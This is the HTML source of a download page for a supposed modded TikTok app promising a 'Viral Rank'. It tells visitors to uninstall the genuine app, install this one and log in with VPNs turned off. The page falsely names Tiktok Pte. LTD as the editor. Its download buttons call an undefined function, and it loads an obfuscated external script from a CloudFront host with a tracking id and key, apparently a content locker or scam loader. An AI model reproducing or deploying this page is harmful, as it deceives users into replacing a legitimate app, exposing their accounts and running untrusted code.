<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=0.5, user-scalable=no">
        <link rel="icon" href="./tiktok-6338432_960_720.webp" type="image/x-icon">
        <style>
    body{
        margin: 0;
        background-color: #0b0c0f;
        display: flex;
        justify-content: center;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;

    }

    .main-image{
        color: white;
        text-align: center;
    }
    .main-image p{
        text-align: left;
        font-size: 15px;
    }
    .main-image img{
        margin-top: 100px;
        height: 150px;
        width: auto;
    }

/* CSS */
.button-21 {
  align-items: center;
  appearance: none;
  background-color: #e72121;
  background-image: linear-gradient(3deg, #000000, #f31414 75%);
  background-size: calc(100% + 20px) calc(100% + 20px);
  border-radius: 100px;
  border-width: 0;
  box-shadow: none;
  box-sizing: border-box;
  color: #FFFFFF;
  cursor: pointer;
  display: inline-flex;
  font-family: CircularStd,sans-serif;
  font-size: 1rem;
  height: auto;
  justify-content: center;
  line-height: 1.5;
  padding: 6px 20px;
  position: relative;
  text-align: center;
  text-decoration: none;
  transition: background-color .2s,background-position .2s;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
  vertical-align: top;
  white-space: nowrap;
}

.button-21:active,
.button-21:focus {
  outline: none;
}

.button-21:hover {
  background-position: -20px -20px;
}

.button-21:focus:not(:active) {
  box-shadow: rgba(40, 170, 255, 0.25) 0 0 0 .125em;
}

table {
    color: white;
    margin-left: 170px;
    text-align: left;
    height: 250px;
}
.second{
    padding: 00px 100px;
}

@media only screen and (max-width: 100px) {
      body {
        font-size: 24px;
      }
    }
</style>
    </head>
    <body>
        <div class="main-image">
            <img src="./tiktok-6338432_960_720.webp">
            <h2>Tiktok</h2>
            <button onclick="_TG()" class="button-21" role="button">Download Now !</button>
            <h4>How to Use :</h4>
            <p>1- First of all, you have to uninstall the tiktok app you have on mobile.</p>
            <p>2- Download the Tiktok from here.</p>
            <p>3- Don't use VPN or Proxy, just enter to your account normally and post any video.</p>
            <p>4- Enjoy The Rank !</p>
            <h4>Information About the App</h4>
            <table>
                <tr>
                    <th>Name</th>
                    <th class="second">Tiktok</th>
                </tr>
                <tr>
                    <th>MOD Features</th>
                    <th class="second">Viral Rank</th>
                </tr>
                <tr>
                    <th>Version</th>
                    <th class="second">33.0.5</th>
                </tr>
                <tr>
                    <th>App Size</th>
                    <th class="second">230 MB</th>
                </tr>
                <tr>
                    <th>Editor</th>
                    <th class="second">Tiktok Pte. LTD</th>
                </tr>
            </table>
            <button onclick="_TG()" class="button-21" role="button" style="margin-top: 25px; margin-bottom: 100px;">Download Now !</button>
        </div>
        <script>

        </script>
        <script type="text/javascript">
            var ZuJpc_OHQ_LAvZEc={"it":4233055,"key":"16235"};
        </script>
        <script src="https://d26h1wdc757l2w.cloudfront.net/ee4bf30.js"></script>
    </body>
</html>